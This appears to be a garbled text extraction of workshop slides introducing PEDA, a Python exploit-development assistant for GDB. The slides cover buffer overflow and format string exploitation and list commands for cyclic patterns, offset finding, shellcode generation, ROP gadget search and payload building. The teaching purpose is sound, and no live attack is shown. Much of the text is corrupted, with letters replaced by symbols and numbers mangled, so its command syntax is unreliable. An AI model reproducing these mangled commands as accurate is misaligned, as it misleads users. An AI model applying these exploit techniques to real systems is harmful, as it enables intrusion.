Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Long Le
longld@vnsecurity.net
'irtual machine
'(!are ) 'irtualBox *+untu %,.,-. Live /D I#0 Internet connection $1A2)Bridge& 3e4uired pac"ages
$ sudo apt-get install nasm micro-inetd
0ptional pac"ages
$ sudo apt-get install libc6-dbg vim ssh
PEDA tool
/reate a 8.gd+init9
~/.gdbinit
!or"shop exercises
Lac" o? intuitive inter?ace Lac" o? smart context display Lac" o? commands ?or ExDev GDB scripting is wea" #ince GDB @., Power?ul scripting API $v@. .&
<
Python GDB
PEDA Introduction
Python Exploit Development Assistance ?or GDB Python GDB init script
GDB @.xA Python .<. #el? help manual Auto:completion o? commandsA options
PEDA ?eatures
0ccupy EIP Cind the o??set$s& Determine the attac" vector Build the exploit 2est)de+ug the exploit
%,
%%
stac" data ) heap text li+rary $li+c& code chun" $30P& stac" pivoting
%5
Payload
!rapper
%-
%;
Demo H Practices
Bu??er over?low exploit Cormat string exploit PEDA commands explanation and usage
%<
PEDA /ommands
%@
pattern create
pattern create "''' pattern create "''' input
pset arg
pset arg ()*"''( pset arg (cyclic%pattern+"'',(
pset env
pset env -.. (cyclic%pattern+"'',(
%D
/ontext display
3egisters
context reg
/ode
context code
#tac"
context stac$
%E
3untime in?o
3egister ) address
xinfo register eax xinfo 'xb/d00'''
#tac" ) memory
telescope 1' telescope 'xb/d00''' 1'
pattern o??set
pattern offset $pc
pattern search
pattern search
Imp)call search
Impcall
2mpcall 2mpcall eax 2mpcall esp libc
Generate shellcode)nopsled
gennop
gennop 3'' gennop 3'' 4x5'
shellcode
shellcode x06/linux exec
assem+le
assemble
Exploit wrapper
s"eleton
s$eleton argv exploit.py
(emory search
searchmem ) ?ind
find /bin/sh libc find 'xdeadbeef all find ..4x'14x'0 'x'0'10''' 'x'0'15'''
re?search
refsearch /bin/sh refsearch 'xdeadbeef
loo"up address
loo$up address stac$ libc
loo"up pointer
loo$up pointer stac$ ld-"
;
asmsearch
asmsearch int 'x0' asmsearch add esp6 7 libc
ropsearch
ropsearch pop eax ropsearch xchg eax6 esp libc
dumprop
dumprop dumprop binary pop
ropgadget
el?header ) readel?
elfheader elfheader .got readelf libc .text
el?sym+ol
elfsymbol elfsymbol printf
payload
payload copybytes payload copybytes target /bin/sh payload copybytes 'x'0'1a'!' offset
dumpmem
dumpmem libc.mem libc
loadmem
loadmem stac$.mem 'xbffdf'''
cmpmem
cmpmem 'x'0'15''' 'x'0'1a''' data.mem
xormem
xormem 'x'0'15''' 'x'0'1a''' the$ey
patch
patch $esp 'xdeadbeef patch $eax the long string pattern patch 'xdeadbeef !'' patch +multiple lines,
E
strings
strings strings binary 1
hexdump
hexdump $sp 61 hexdump $sp /"'
hexprint
hexprint $sp 61 hexprint $sp /"'
5,
pdisass
pdisass $pc /"'
nearpc
nearpc "' nearpc 'x'0'10101
plt+rea"
pltbrea$ cpy
deactive
deactive setresuid deactive chdir
unptrace
unptrace
5%
stepuntil
stepuntil cmp stepuntil xor nextcall cpy next2mp
tracecall ) ?trace
tracecall tracecall cpy6printf tracecall -puts6fflush
traceinst ) itrace
traceinst "' traceinst cmp6xor
5
wait?or
#aitfor #aitfor myprog -c
snapshot
snapshot save snapshot restore
assem+le
assemble $pc mov al6 'xb int 'x0' end
procin?o
procinfo procinfo fd
55
/on?ig options
pshow
psho# psho# option context
pset option
pset option context code6stac$ pset option badchars 4r4n
5-
Glo+al instances
pedacmd7
Interactive commands 3eturn nothing e.g7 pedacmd.context%register+, Bac"end ?unctions that interact with GDB 3eturn values e.g7 peda.getreg+eax,
peda7
*tilities
Getting help
pyhelp peda pyhelp hex"str
5<
External scripts
A myscript.py def myrun+size,@ argv & cyclic%pattern+size, peda.execute+set arg Bs B argv, peda.execute+run, gdb-peda$ source myscript.py gdb-peda$ python myrun+!'',
5@
PEDA structure
PEDA class
Interact with GDB Bac"end ?unctions Interactive commands /on?ig options /ommon utils External li+raries
5D
PEDA/md class
*tilities
#pecial ?unctions
5E
-,
Cuture plan
-%
2han" youK